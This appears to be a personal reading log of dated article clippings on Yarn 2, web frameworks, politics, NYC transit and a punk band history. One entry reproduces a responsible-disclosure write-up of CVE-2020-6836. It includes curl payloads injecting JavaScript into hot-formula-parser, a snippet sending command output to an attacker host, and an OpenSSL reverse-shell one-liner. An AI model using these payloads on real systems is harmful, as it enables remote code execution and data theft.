explore them in more detail - watch this space! Build Dependency Tracking A recurring problem in Yarn 1 was that native packages used to be rebuilt much more often than they should have been. For example, running yarn remove used to completely rebuild all packages in your dependency tree. Starting from Yarn 2 we now keep track of the individual dependency trees for each package that lists postinstall scripts, and only run them when those dependency trees changed in some way: ➤ YN0000: ┌ Link step ➤ YN0007: │ sharp@npm:0.23.0 must be rebuilt because its dependency tree changed ➤ YN0000: └ Completed in 16.92s ➤ YN0000: Done with warnings in 21.07s Per-Package Build Configuration Yarn 2 now allows you to specify whether a build script should run or not on a per-package basis. At the moment the default is to run everything, so you can choose to disable the build for a specific package through its dependenciesMeta entry. If you instead prefer to disable everything by default, just toggle off enableScripts in your settings then explicitly enable the built flag in dependenciesMeta. Normalized Shell Back when Yarn 2 was still young, the very first external PR we received was about Windows support. As it turns out Windows users are fairly numerous, and compatibility is important to them. In particular they often face problems with the scripts field which is typically only tested on Bash. Yarn 2 ships with a rudimentary shell interpreter that knows just enough to give you 90% of the language structures typically used in the scripts field.
Thanks to this interpreter, your scripts will run just the same regardless of whether they're executed on OSX or Windows. Even better, this shell allows us to build tighter integrations, such as exposing the command line arguments to the user scripts. Improved Peer Dependency Links Because Node calls realpath on all required paths (unless --preserve-symlinks is on, which is rarely the case), peer dependencies couldn't work through yarn link as they were loaded from the perspective of the true location of the linked package on the disk rather than from its dependent. Thanks to Plug’n’Play which can force Node to instantiate packages as many times as needed to satisfy all of their dependency sets, Yarn is now able to properly support this case. New Lockfile Format Back when Yarn was created, it was decided that the lockfile would use a format very similar to YAML but with a few key differences (for example without colons between keys and their values). It proved fairly annoying for third-party tools authors, as the parser was custom-made and the grammar was anything but standard. Starting from Yarn 2, the format for both lockfile and configuration files changed to pure YAML: "@yarnpkg/parsers@workspace:^2.0.0-rc.6, @yarnpkg/parsers@workspace:packages/yarnpkg-parsers": version: 0.0.0-use.local resolution: "@yarnpkg/parsers@workspace:packages/yarnpkg-parsers" dependencies: js-yaml: ^3.10.0 pegjs: ^0.10.0 languageName: unknown linkType: soft TypeScript Codebase While it might not directly impact you as a user, we've fully migrated from Flow to TypeScript. One huge advantage is that our tooling and contribution workflow is now easier than ever. And since we now allow building Yarn plugins, you'll be able to directly consume our types to make sure your plugins are safe between updates. export interface Package extends Locator { version: string | null, languageName: string, linkType: LinkType, dependencies: Map<IdentHash, Descriptor>, peerDependencies: Map<IdentHash, Descriptor>, dependenciesMeta: Map<string, Map<string | null, DependencyMeta>>, peerDependenciesMeta: Map<string, PeerDependencyMeta>, }; Modular Architecture I recently wrote a whole blog post on the subject so I won't delve too much into it, but Yarn now follows a very modular architecture. In particular, this means two interesting things: You can write plugins that Yarn will load at runtime, and that will be able to access the true dependency tree as Yarn sees it; this allows you to easily build tools such as Lerna, Femto, Patch-Package, ... You can have a dependency on the Yarn core itself and instantiate the classes yourself (note that this part is still a bit experimental as we figure out the best way to include the builtin plugins when operating under this mode). To give you an idea, we've built a typescript plugin which will automatically add the relevant @types/ packages each time you run yarn add. Plugins are easy to write - we even have a tutorial - so give it a shot sometime! Normalized Configuration One very common piece of feedback we got regarding Yarn 1 was about our configuration pipeline. When Yarn was released we tried to be as compatible with npm as possible, which prompted us to for example try to read the npm configuration files etc. This made it fairly difficult for our users to understand where settings should be configured.
In Yarn 2, the whole configuration has been revamped and everything is now kept within a single source of truth named .yarnrc.yml: initScope: yarnpkg npmPublishAccess: public yarnPath: scripts/run-yarn.js The settings names have changed too in order to become uniform (no more experimental-pack-script-packages-in-mirror vs workspaces-experimental), so be sure to take a look at our shiny new documentation. Strict Package Boundaries Packages aren't allowed to require other packages unless they actually list them in their dependencies. This is in line with the changes we made back when we introduced Plug'n'Play more than a year ago, and we're happy to say that the work we've been doing with the top maintainers of the ecosystem has been fruitful. Nowadays, very few packages still have compatibility issues with this rule. // Error: Something that got detected as your top-level application // (because it doesn't seem to belong to any package) tried to access // a package that is not declared in your dependencies // // Required package: not-a-dependency (via "not-a-dependency") // Required by: /Users/mael/my-app/ require(`not-a-dependency`); Deprecating Bundle Dependencies Bundle dependencies are an artefact of another time, and all support for them has been dropped. The installs will gracefully degrade and download the packages as originally listed in the dependencies field. Should you use bundle dependencies, please check the Migration Guide for suggested alternatives. Read-Only Packages Packages are now kept within their cache archives. For safety and to prevent cache corruptions, those archives are mounted as read-only drives and cannot be modified under normal circumstances: const {writeFileSync} = require(`fs`); const lodash = require.resolve(`lodash`); // Error: EROFS: read-only filesystem, open '/node_modules/lodash/lodash.js' writeFileSync(lodash, `module.exports = 42;`); If a package needs to modify its own source code, it will need to be unplugged - either explicitly in the dependenciesMeta field, or implicitly by listing a postinstall script. Conclusion Wow. That's a lot of material, isn't it? I hope you enjoy this update, it's the culmination of literally years of preparation and obstinacy. Everything I believe package management should be, you'll find it here. The result is for sure more opinionated than it used to be, but I believe this is the way going forward - a careful planning of the long term user experience we want to provide, rather than a toolbox without directions. As for me, working on Yarn has been an incredible experience. I'm simultaneously project manager, staff engineer, lead designer, developer relations, and user support. There are ups and downs, but every time I hear someone sharing their Yarn success story my heart is internally cheering a little bit. So do this: tell me what you like, and help fix what you don't. Happy 2020! 🎄 Source: Introducing Yarn 2 ! 🧶🌟 – DEV Community 👩‍💻👨‍💻

    Read at 08:13 pm, Jan 24th

  • Tenant unions: building dual power in the neighborhood

    So we see that the crisis of modern society is not without issue. It contains the seeds of something new, which is emerging even now. But the new will not come about automatically.

    Read at 02:37 pm, Jan 24th

  • Electoral Road to Socialism?

    The present trade unions in the USA tend to obsess about following the law.

    Read at 02:26 pm, Jan 24th

  • Silicon Valley Abandons the Culture That Made It the Envy of the World

    For decades, whole regions, nations even, have tried to model themselves on a particular ideal of innovation, the lifeblood of the modern economy.

    Read at 02:15 pm, Jan 24th

  • Announcing styled-components v5: Beast Mode 💪🔥

    EJ: Updated January 13, 2020 with the formal v5 release. We are very excited to announce that styled-components v5 is here! There are no breaking changes: as long as your app is running the latest version of React, styled-components v5 should just work. ✨

    Read at 12:18 pm, Jan 24th

  • Next.js 9.2

    We are excited today to introduce Next.js 9.2, featuring: Built-In CSS Support for Global Stylesheets: Applications can now directly import .css files as global stylesheets. Built-In CSS Module Support for Component-Level Styles: Leveraging the .module.css extension.
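A minimal sketch of how these two features are used (file names are illustrative; global stylesheets go through the custom App component, per Next.js convention):

// pages/_app.tsx - global stylesheets are imported once, here.
import '../styles/global.css';

import { AppProps } from 'next/app';

export default function App({ Component, pageProps }: AppProps) {
  return <Component {...pageProps} />;
}

Component-level styles use the .module.css naming convention instead, e.g. import styles from './Button.module.css' inside the component that needs them.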

    Read at 04:04 am, Jan 24th

  • No to Chinese Authoritarianism, No to "Yellow Peril"

    The People’s Republic of China (PRC)’s rise in recent decades has confounded the Western left.

    Read at 02:35 am, Jan 24th

  • Gutenberg Can Tackle the Problems the Fields API Tried to Solve

    The Fields API. Never heard of it? That’s OK. Outside of the inner development community, it is not widely known. The average WordPress user does not need to know about it.

    Read at 02:31 am, Jan 24th

  • Sanders apologizes to Biden for surrogate's op-ed alleging he has a "big corruption problem"

    "It is absolutely not my view that Joe is corrupt in any way. And I'm sorry that that op-ed appeared," Sanders told CBS News. While Teachout does not officially work on the Sanders campaign, she stumps for him, and has introduced and endorsed him.

    Read at 02:26 am, Jan 24th

  • WebSockets for fun and profit

    Seamless communication is a must on the modern web. As internet speeds increase, we expect our data in real time. To address this need, WebSocket, a popular communication protocol finalized in 2011, enables websites to send and receive data without delay.
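A minimal sketch of the browser side of such a connection (URL and message shapes are illustrative):

// Open a WebSocket connection; wss:// is the TLS-secured variant.
const socket = new WebSocket("wss://example.com/updates");

socket.addEventListener("open", () => {
  // Tell the server what we want to receive.
  socket.send(JSON.stringify({ type: "subscribe", channel: "prices" }));
});

socket.addEventListener("message", (event) => {
  // Data arrives as soon as the server pushes it - no polling required.
  console.log("update:", JSON.parse(event.data));
});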

    Read at 12:02 am, Jan 24th

Day of Jan 23rd, 2020

  • The Twitter Electorate Isn’t the Real Electorate

    Does Twitter matter? The temptation is to say no. Its user base is small compared with Facebook—321 million monthly active users versus more than 2 billion—and a quick glance at the trending topics reveals its fractious, claustrophobic atmosphere.

    Read at 11:54 pm, Jan 23rd

  • Paper Plates from Jersey Make Scamming NYC Easy! – Streetsblog New York City

    Tomorrow night, Manhattan Borough President Scott Stringer will join the Community Board 12 Public Safety Committee and NYPD officials for a public meeting on out-of-control drivers in Inwood and Washington Heights. (Motorcycles confiscated by the 34th Precinct in Upper Manhattan. Photo: Manhattan Times.) Reckless driving isn’t new or unique to Upper Manhattan, of course, but […] An out-of-the-way no parking zone next to the Inwood Hill Park playground has become a hotbed of public space theft. The Inwood Greenmarket, on Isham Street, can tolerate a handful of parked cars … In August, the Manhattan Times reported that the city’s Greenmarket program was considering a new location at W. 185th Street, near Bennett Park, in Washington Heights. It seems the effort was started by Heights resident and cyclist Marisa Panzani, who was […] It's been tried all over the country, with some big hiccups. But parking management could succeed here. The key word is "could." The city recently replaced four parking spots at Park Terrace West and W. 218th Street, in Inwood, with a no standing zone. The 34th Precinct reportedly requested the change to give drivers exiting Park Terrace West, a northbound one-way street, a better view of east-west traffic on 218th. Inevitably, car owners accustomed to parking at […] We asked for photos of NYC’s worst sidewalk-hogging businesses, and readers responded. We relaxed our guidelines a little to make room for government agencies. In the arena of public institutions that show no respect for people on foot, the United States Postal Service and employees of Metro-North in Harlem deserve special recognition. Not surprisingly, car-related […] Source: Paper Plates from Jersey Make Scamming NYC Easy! – Streetsblog New York City

    Read at 10:55 pm, Jan 23rd

  • Reverse shell through a node.js math parser - TRUESEC Blog

    CVE-2020-6836 Recently, I performed a penetration test of a typical single-page application, exposing a static React web app and a REST API written in Node.js. This article details how I discovered and exploited a critical vulnerability (now known as CVE-2020-6836) that allowed unauthenticated arbitrary remote code execution. The API had an endpoint that was kind of interesting. It had a parameter that seemed to be interpreted as a mathematical expression (similar to how Excel interprets such expressions). As it turns out, it made use of a module named hot-formula-parser[1] which has about 38 000 weekly downloads and 39 dependents. The module is more or less an advanced calculator. This kind of functionality is always interesting for a penetration tester because it tends to be more powerful than the developers realize. The application passed user-controlled input to the parse function of the module. The below code does just that and will be used throughout the article. var express = require("express"); var app = express(); var FormulaParser = require("hot-formula-parser").Parser; app.post('/formula', function(req, res) { var parser = new FormulaParser(); var output = parser.parse(req.body.calc); // <---- res.send(output); }); app.listen(3000, function() { console.log("Listening on port 3000"); }); Legitimate usage of the app would look like this: curl -H "Content-Type: application/json" -X POST -d '{"calc":"(SUM([1,2])-1)*2"}' http://TARGET:PORT/formula Giving the result ‘4’: {"error":null,"result":4} Nothing special, but under the hood something interesting has happened. Looking at the commit history of the module, we can see that version 3.0.0 used the dangerous function eval to parse arrays. Eval is a function that dynamically evaluates code, not only arrays. Basically any javascript we submit should be executed. To test it out we could perform a time-consuming request, following the concept of ‘time-based exploitation’: we’ll know that it works if (and only if) the website takes longer to load than normal. We’ll make the application sleep by invoking the function execSync with the argument sleep 10. The execSync function is executed in the main thread and thus blocks the execution until the command has completed. Finally, we write it all inside a self-invoking function (note the parenthesis at the end). curl -H "Content-Type: application/json" -X POST -d '{"calc":"SUM([(function(){require(\"child_process\").execSync(\"sleep 10\")})(),1])"}' http://TARGET:PORT/formula We execute and…… tada! The page took a bit over 10 seconds to load! At this point it is very likely that the application is vulnerable. To be sure we can try a number of different delays, and we notice that the delay is actually working as we instruct it to. By the way, in the actual penetration test, this is where you stop and rapidly ask the customer to take down the application from production. However, for the sake of this article, let’s see what the impact of this vulnerability really was. To start with — we are still blind. We want to execute a command and get back the output of the command. How could we get back the stdout though? There are a few ways to do this. We will make a HTTP request containing the stdout back to an attacker controlled web server.
    In code it would look like the below:

    (function() {
      require("child_process").exec(COMMAND, function(code, stdout) {
        require("http").get("http://ATTACKER:PORT/?x=" + stdout)
      })
    })()

    We put the code into the vulnerable parameter and send the request using Burp. We executed the command whoami and got back the value root. This is the name of the account running the vulnerable application.

    Popping a shell

    At this point we have what is known as a non-interactive shell, but that’s very tedious to work with. We probably want to get interactive by spawning a shell. There are many techniques to do this, since we are able to execute arbitrary server-side JavaScript. Anyway, I want to show a neat technique from GTFOBins[2] that serves well for a PoC like this. Don’t interpret this as the only way, and don’t assume you are immune just because you, for example, drop outgoing connections like the one below. We will get a TLS-encrypted reverse shell by abusing a program that likely already exists on the victim machine, namely OpenSSL. The code will look as follows:

    (function() {
      var c = require('child_process');
      c.exec("mkfifo .s");
      c.exec("/bin/sh -i < .s 2>&1 | openssl s_client -quiet -connect ATTACKER:PORT > .s");
      c.exec("rm .s");
    })()

    In a nutshell, what we are doing is:

    1. Create a named pipe “.s” (a FIFO special file), which is very similar to a pipe: two processes can open it on each end and send data back and forth.
    2. Spawn an interactive Bourne shell, redirect the named pipe to the shell’s stdin, and pipe the shell’s stdout/stderr to OpenSSL’s stdin.
    3. Connect to the server using OpenSSL’s built-in test client, sending OpenSSL’s stdin (i.e. the shell’s stdout/stderr) to the remote host, and redirecting data received from the remote host to the named pipe (i.e. the shell’s stdin).
    4. Finally, remove the special file from disk.

    You could also use the -proxy flag if you need it to be proxy aware. On the attacker side we generate a certificate and start a listener:

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    openssl s_server -quiet -key key.pem -cert cert.pem -accept *:PORT

    After some final touches we send it, and then, voila!

    Disclosure timeline

    2019-12-14: Reported to NPM
    2019-12-18: Vulnerability confirmed by NPM security team
    2020-01-09: Advisory published by NPM [3]
    2020-01-11: CVE-2020-6836 assigned by MITRE [4]

    The vulnerability exploited in this article is fixed in hot-formula-parser version 3.0.1.

    References

    [1] https://www.npmjs.com/package/hot-formula-parser
    [2] https://gtfobins.github.io/
    [3] https://www.npmjs.com/advisories/1439
    [4] https://nvd.nist.gov/vuln/detail/CVE-2020-6836

    Want to learn more? Alexander is speaking at the two-day event Cyber Security Summit 2020. A great time to ask him more questions about this or other findings! If you need an even deeper understanding and training, join our class, “Cybersecurity attacks and defenses – Red vs. blue team!”, on Geek Week, with Alexander as one of the instructors!

    Source: Reverse shell through a node.js math parser – TRUESEC Blog
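
    As a footnote to the write-up above: the real fix is upgrading to hot-formula-parser 3.0.1 or later, but it is worth seeing how cheap a defensive input check is compared to the exploit. Below is a minimal sketch reusing the app and FormulaParser from the vulnerable snippet earlier; the SAFE_FORMULA allowlist is my own illustration, not something from the article.

    // Hypothetical allowlist: only plain formula characters get through.
    // Illustrative only; upgrading the module is the actual fix.
    var SAFE_FORMULA = /^[\w+\-*\/().,\[\] ]+$/;

    app.post('/formula', function(req, res) {
      var calc = String(req.body.calc || "");
      if (!SAFE_FORMULA.test(calc)) {
        // Braces and quotes (needed for the payloads above) are rejected here.
        return res.status(400).send({ error: "invalid formula", result: null });
      }
      var parser = new FormulaParser();
      res.send(parser.parse(calc));
    });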

    Read at 10:44 pm, Jan 23rd

  • Andy Byford, New York City’s Subway Chief, Resigns - The New York Times

    He arrived nearly two years ago to turn around the city’s failing subway, making significant progress.

    Andy Byford. Credit: Chang W. Lee/The New York Times

    Two years after he arrived to turn around New York City’s failing subway, Andy Byford resigned on Thursday. Mr. Byford, a British transit veteran who oversaw the subway and buses as the president of New York City Transit, made significant progress during his tenure. But he also repeatedly tangled with Gov. Andrew M. Cuomo over dueling visions for the future of the transit system. “I’m very proud of what we have achieved as a team over the past two years and I believe New York City Transit is well-placed to continue its forward progress,” Mr. Byford said in a statement. His departure, which was first reported by Politico, could jeopardize the current campaign to fix the subway. He had ambitious plans to transform the system and a unique mix of charisma and a dogged work ethic that made New Yorkers believe in him. His arrival in January 2018 was celebrated as a turning point for the subway, and profiles in The New Yorker and on 60 Minutes followed. Only 58 percent of trains were on time the month that Mr. Byford started. There were near-constant meltdowns, and several train derailments raised safety concerns. Mr. Byford helped push the on-time rate over 80 percent through a series of operational changes and a focus on the basics. He said he wanted to bring the on-time rate into the 90s and proposed an ambitious overhaul of the subway’s ancient signal equipment. But Mr. Byford struggled to get along with Mr. Cuomo, who controls the subway and the flow of money to the system. Colleagues say both men have supersize egos and wanted credit for the subway’s success. They quarreled over plans to fix the L train and new technology to upgrade signals. Some believed Mr. Byford’s rock-star status may have irked Mr. Cuomo. They compared the dynamic to Mayor Rudolph W. Giuliani and his police commissioner, William J. Bratton, who resigned in 1996 shortly after being on the cover of Time magazine. When Mr. Byford publicly questioned Mr. Cuomo’s decision to call off the shutdown of the L train tunnel between Manhattan and Brooklyn, Mr. Byford suddenly found himself sidelined. The two men did not speak for four months in 2019. Their relationship appeared to improve in recent months. Then Mr. Byford tried to resign in October, citing concerns over budget cuts and interference by Mr. Cuomo’s office. His bosses at the transit agency convinced him to stay, but the détente did not last long. “Andy Byford will be departing New York City Transit after a successful two years of service and we thank him for his work,” said Patrick J. Foye, the chairman of the Metropolitan Transportation Authority, the agency that operates the subway. “Andy was instrumental in moving the system forward, enacting the successful Subway Action Plan and securing record capital funding with the Governor and the Legislature, and we wish him well in his next chapter.”

    Source: Andy Byford, New York City’s Subway Chief, Resigns – The New York Times

    Read at 05:19 pm, Jan 23rd

  • 'This movement is just beginning': homeless moms evicted after taking over vacant house

    For almost two months, an unassuming white house on Magnolia Street in Oakland was home for Dominique Walker and her family. Her one-year-old son, Amir, took his first steps in the living room. He said his first words there, too – “thank you”.

    Read at 02:59 pm, Jan 23rd

  • Trump Privately Obsessed With Bernie Sanders’ Popularity and Socialism’s Appeal

    In public, President Donald Trump has fixated on mocking Sen. Bernie Sanders (I-VT) as “crazy” and has focused on assuring supporters of how badly he’d crush the left-wing senator in a general election and protect them from Sanders’ creeping socialism.

    Read at 02:47 pm, Jan 23rd

  • TypeScript's Secret Parallel Universe

    Almost four years ago, I was a new TypeScript user, amazed by the possibilities that this freshly learned JavaScript dialect opened up to me. But just like every TypeScript developer, I soon ran into some hard-to-debug problems.

    Read at 02:44 pm, Jan 23rd

  • Municipalist Syndicalism: From The Workplace to The Community

    Union membership in the United States is at its lowest level in decades. Nonetheless, unions have hit a 50-year high in public approval. Enthusiasm for unions is not manifesting solely in polls, but also in shop floor organizing by young and lower middle-aged workers.

    Read at 02:42 pm, Jan 23rd

  • The forgotten story of Pure Hell, America’s first black punk band | Dazed

    The four-piece lived with the New York Dolls and played with Sid Vicious, but they’ve been largely written out of cultural history.

    An essential part of learning history is questioning it, asking what has become part of our cultural memory and what might have been left out. When it comes to the history of punk music, there are few bands who have been as overlooked as Pure Hell. The band’s story began in West Philadelphia in 1974, when four teenagers – lead vocalist Kenny ‘Stinker’ Gordon, bassist Lenny ‘Steel’ Boles, guitarist Preston ‘Chip Wreck’ Morris and drummer Michael ‘Spider’ Sanders – set out to follow in the footsteps of their musical idols. A shared obsession with the sounds of Iggy, Bowie, Cooper, and Hendrix inspired them to create music that was louder, faster and more provocative than even those artists’ most experimental records. Pure Hell’s unique sound led them to New York, where they became characters in a seminal subculture recognised today as punk. As musicians of colour, their contribution to a predominantly white underground scene is all the more significant. “We were the first black punk band in the world,” says Boles. “We were the ones who paid the dues for it, we broke the doors down. We were genuinely the first. And we still get no credit for it.” The title of the ‘first black punk band’ has, in recent years, been informally given to Detroit-based Death, whose music was mostly unheralded at the time but has since been rediscovered and praised for its progressive ideas. But while Death were creating proto-punk music in isolation in the early 1970s, Pure Hell was completely entrenched in the New York City underground scene, living and performing alongside the legends of American punk. Arriving the same month that Patti Smith and Television began their two-month residencies at CBGB and leaving just after Nancy Spungen’s murder, Pure Hell’s active years in the city aligned perfectly with the birth and death of a dynamic chapter of music history. “I don’t want to be remembered just because we were black,” says Kenny Gordon. “I want to be remembered for being a part of the first tier of punk in the 70s.” Being just 155 km from Greenwich Village, Philadelphia was somewhat of a pipeline of New York subculture – Gordon remembers his teenage years at the movie theatre watching John Waters films like Polyester and Pink Flamingos, and hanging out at Artemis, a spot frequented by Philly scenesters like Nancy Spungen and Neon Leon. “I heard (The Rolling Stones’) ‘Satisfaction’ and knew it was the kind of music I wanted to play,” recalls bassist Lenny Boles. “I was too poor to afford instruments, so if someone had one, I would befriend them.”

    Pure Hell. Courtesy of Pure Hell

    The quartet quickly gained notoriety on their home turf. “Growing up in West Philadelphia, which was all black, we were some of the craziest guys you could have possibly seen walking the streets back then,” says Gordon. “We dressed in drag and wore wigs, basically daring people to bother us. People in the neighbourhood would say, ‘Don’t go into houses with those guys, you may not come out!’” Pure Hell swan dove into the New York underground scene in 1975, in pursuit of the people, places, and sounds they’d read about for years in the pages of Rock Scene and Creem magazine.
    The band moved into the Chelsea Hotel, the temporary home of a long list of influential characters, including Bob Dylan, Leonard Cohen, Janis Joplin, Jim Morrison, Edie Sedgwick, Patti Smith, and Robert Mapplethorpe. Their first gig in the city was hosted at Frenzy’s thrift, a storefront on St. Marks Place, where guitarist Preston Morris “rather memorably caught the amplifier on fire due to a combination of maximum volume and faulty wires”, says Gordon. Drummer Michael Sanders’ friendship with Neon Leon led the band to the New York Dolls, who were acting as mentors for younger artists like Debbie Harry and Richard Hell at the time. Pure Hell was soon invited to perform for the Dolls in their loft.

    “We were the first black punk band in the world... and we still get no credit for it” – Lenny Boles, Pure Hell bassist

    “Honestly, we were scared to death of them,” Boles says. “When we walked in, they were all dressed up, smoking joints and watching The Untouchables on TV. Fortunately, we played and blew them away.” Gordon adds: “Underneath their outer appearance, they were just a bunch of guys from Queens. We had the same lingo. We were both really street and really genuine. It’s like, they were white but playing black, and we were just the opposite. We were innovative and they definitely appreciated us for it.” After being kicked out of the Chelsea for not paying rent, Pure Hell moved into the Dolls’ loft. “Everybody hated us at first. We had a bad reputation because of our association with the New York Dolls, who were doing a lot of dope at the time,” says Boles. “The way we looked, everybody thought we were in a gang. Actually, we used to live in gang territory in West Philly, and people were always trying to get us to join. We never did. And with a name like Pure Hell, people thought we were devil worshippers.” Gordon adds: “This was New York City, this was punk. People don’t realise it was ruthlessly competitive. It was dog eat dog.” Although they felt that few people were on their side, their kinship with Johnny Thunders led to numerous gigs at Andy Warhol’s haunt, Max’s Kansas City, and Mother’s, a Chelsea gay bar turned punk club, where Blondie first performed. The band was featured in a number of publications, namely Warhol’s own Interview magazine, marking their ‘place’ in a scene of cultural influencers.

    Pure Hell with Sid Vicious in Melody Maker magazine. Early punk artists often flirted with Nazi symbolism for shock value. Courtesy of Pure Hell

    Despite their growing presence in the underground, Pure Hell still didn’t have a manager. After reading a biography of Jimi Hendrix by Curtis Knight, the singer and frontman of Hendrix’s first band The Squires, Lenny Boles chased down the author’s address and arrived on his doorstep. Boles’ bold act of promotion earned them management from the man credited with Hendrix’s discovery. Kathy Knight, Curtis’s then-partner in life and business, recalls her ex-husband’s first impressions of Pure Hell. “He loved them immediately,” she says. “After Lenny knocked on the door, Curtis brought me to one of the clubs where they were performing on Bleecker Street. Stinker (Kenny Gordon) almost landed in my lap when he did a backflip off the stage. We were so blown away that we put everything we had into them at the time.” Those who saw Pure Hell in action describe their shows similarly. Gordon’s background in gymnastics gave them an unparalleled stage presence, with choreography that he says he performed “crash dummy style”.
    Pure Hell’s sound was harsher than that of their peers and predecessors, and is today recognised as proto-hardcore. “We were like four Jimi Hendrixes, and Curtis knew it,” Gordon says. “We aimed for impact, just because we could. A lot of people at the time couldn’t play like Chip, doing Hennessy licks and everything. Not everyone could copy that.” Curtis and Kathy Knight were so enthusiastic about Pure Hell that they sacrificed three months of rent money for studio sessions. Knight organised Pure Hell’s first European tour in 1978, which resulted in their single “These Boots are Made for Walking” reaching number four in the UK alternative charts. Later, they opened for Sid Vicious at Max’s during his New York residency. It would end up being his last public appearance, and Pure Hell found themselves looped into the media circus surrounding Nancy Spungen’s death. “We were on the second page of the majority of the tabloids, like New Musical Express, Sounds, and Melody Maker,” says Gordon. But beyond their association with Vicious, Pure Hell’s European tour was a major success, in part due to Curtis Knight’s strategic marketing campaign, which sensationalised their race. After arriving, Knight created a big poster with an image of the band taken by legendary rock photographer Bob Gruen in front of Buckingham Palace, with the slogan: “From the United States of America, the world’s only black punk band”. Boles was angry at the time. “I said to Curtis, ‘Why do you have to call us a black band?’ Of course, that’s what we were, but we really didn’t think in those terms at the time. People in Europe were curious about the band before we even arrived. They were looking at it like a novelty. They didn’t believe we really existed.”

    Pure Hell live at Max’s Kansas City. Early punk artists often flirted with Nazi symbolism for shock value. Courtesy of Pure Hell

    Boles says the band was “plastered by this campaign”, but were able to reap its fruits while touring Holland and the UK. Landing smack dab in the middle of the London punk scene, Pure Hell were welcomed by a parallel movement that had clearer political convictions and more dynamic cross-cultural discourse. “All the punks listened to reggae,” says Boles. “It was about all rebel music.” Gordon adds that “people, incorrectly, view punk as this angry, white, urban, male genre. Black culture is really the source of punk, and a lot of people don’t recognise it – or don’t want to recognise it.” Although they eventually felt accepted in New York, and even celebrated in Europe, the legacy of Jim Crow still haunted the industry, where genres remained segregated. “We experienced racism, but didn’t know it at the time,” says Lenny Boles. “We were watching all of these bands around us, with far less talent, get signed. It had us second-guessing ourselves, thinking we weren’t good enough. Obviously we were. It was a while before we realised we were getting snubbed.” While their white peers were being cut cheques, Pure Hell found themselves courted by a number of record labels, all of whom insisted they change their music in order to align with racial stereotypes. “Everybody was trying to make us do this Motown thing, saying like, ‘You guys are black so you’ve gotta do something that’s danceable,’” Boles adds. “They kept trying to make us more ‘funky’. Everything we liked had nothing to do with dance music. We were not having it. So we opted not to get signed.”

    “I don’t want to be remembered just because we were black. I want to be remembered for being a part of the first tier of punk in the 70s” – Kenny Gordon, Pure Hell vocalist

    Integrity and profitability don’t often go hand-in-hand, and Pure Hell’s refusal to comply with the industry’s limitations meant they sacrificed career opportunities. After a second European tour in 1979, the band suffered a fall-out with Knight. A messy legal conflict resulted in Knight flying back to the US alone, with the band’s master tapes in tow. Pure Hell remained in Europe without any of the rights, or access, to their recordings, which Kathy Knight salvaged after her husband attempted to destroy them. Pure Hell eventually finagled their way back to the US, where they settled in Los Angeles. Although they played historic bills at the Masque (LA’s equivalent to CBGB) with iconic groups like the Germs, the Cramps, and the Dead Boys, Pure Hell lost their momentum. With no management, no record deal, and no access to their recorded output, the band felt the flames of Pure Hell die out. “It was all totally over by 1980,” says Kenny Gordon. “Really, punk died with Nancy’s murder. Everyone was burning the candle from both ends. You had to be extreme to be in those kinds of circles.” Bad Brains’ explosion onto the music scene in the early 80s also left Pure Hell feeling robbed of their title of ‘the first black punk band’. “You know, we took the blow for being black, so why didn’t they give it to us in the end?” Boles asks.

    Pure Hell. Courtesy of Pure Hell

    As decades passed and history books were written, Pure Hell’s memory faded to legend. But in the early 2000s, Kathy Knight fatefully decided to auction off Pure Hell’s master tapes on eBay. Their unreleased album Noise Addiction was purchased by an enthusiastic Mike Schneider of Welfare Records. “Mike wanted them so badly he came himself to pick them up,” Knight recalls. Pure Hell’s legacy has also been promoted and protected by hardcore legend Henry Rollins of Black Flag, who tracked down the original acetate of the band’s first single and reissued it on his label 2.13.61, in collaboration with In the Red Records, last year. Rollins first learned of the band’s existence in 1979, after seeing their single at Yesterday & Today Records in Rockville, Maryland, with his friend Ian MacKaye of Minor Threat and Fugazi. He remained on the lookout for traces of the band for over 30 years. “At auction time, I was able to secure the record,” Rollins says. “I listened to it and was amazed at how good it sounded. I checked in with Kenny (Gordon) and he confirmed it was the only source for the two songs.” Beyond simply highlighting and celebrating the rare black punk bands of the time, Pure Hell held particular significance to Rollins because their urban myth was real. “The rumour was that they had made an album and that it was sitting in a closet,” he says. “Noise Addiction, released in 2006, decades after it had been recorded, is really great. If the album had come out when they made it, that would have been a game changer. I believe (it) would have had a tremendous impact. It’s one of those missed opportunity stories.” In addition to Rollins, indie talent rep Gina Parker-Lawton ranks as one of Pure Hell’s greatest advocates. Parker-Lawton met drummer Michael Sanders on Sunset Boulevard in the 80s, and counted him as a friend during their overlapping years in LA.
    It was after she learned of Sanders’ death in 2003 that Parker-Lawton made contact with the other band members and became their publicist. “They were just kind of overlooked in all of the punk history books,” she says. “After learning their story and what they had actually accomplished, by being the first truly all-black punk band, I wanted to ensure they were remembered.” Parker-Lawton has since been advocating for their deserved place in music history, and recently helped secure their induction into the Smithsonian’s National Museum of African American History and Culture. Their induction will be marked by the donation of Sanders’ leather jacket, which he wore on tour in Europe and around LA. Pure Hell’s story raises essential questions about the integrity of our cultural memory, reminding us that “history” is written within the constructs of an unjust society. “It’s just so important to me that history be correct,” says Parker-Lawton. “Taking the risks that they took, daring to be so different, they were outlaws and true pioneers. When people are that true to their art and that brave, it has to be recognised.” Although their musical careers didn’t necessarily bring wealth or fame, Boles and Gordon describe their years in Pure Hell as paramount. “I had so much fun, it doesn’t matter that I never saw a penny for it,” he says. “For us, it wasn’t about making money. It was about following our hearts and doing exactly what we wanted to do.”

    Source: The forgotten story of Pure Hell, America’s first black punk band | Dazed

    Read at 01:31 pm, Jan 23rd

  • Getting Started with Front End Testing — JavaScript January

    You can also check multiple pages and screen sizes and run multiple tests by adding to the promise array in your test function. You can define the viewport for each test (to test various screen sizes) and different pages of your application.

    const results = await Promise.all([
      pa11y(`http://localhost:65519`, {
        browser: browser,
        standard: 'WCAG2AAA',
        screenCapture: `$/results/pa11y_home_desktop.png`,
        viewport: { width: 1280, height: 1024 },
      }),
      pa11y(`http://localhost:65519`, {
        browser: browser,
        standard: 'WCAG2AAA',
        screenCapture: `$/results/pa11y_home_mobile.png`,
        viewport: { width: 320, height: 480, isMobile: true },
      }),
      pa11y(`http://localhost:65519/blog-post`, {
        browser: browser,
        standard: 'WCAG2AAA',
        screenCapture: `$
      ),
    ])

    Visual Regression Testing

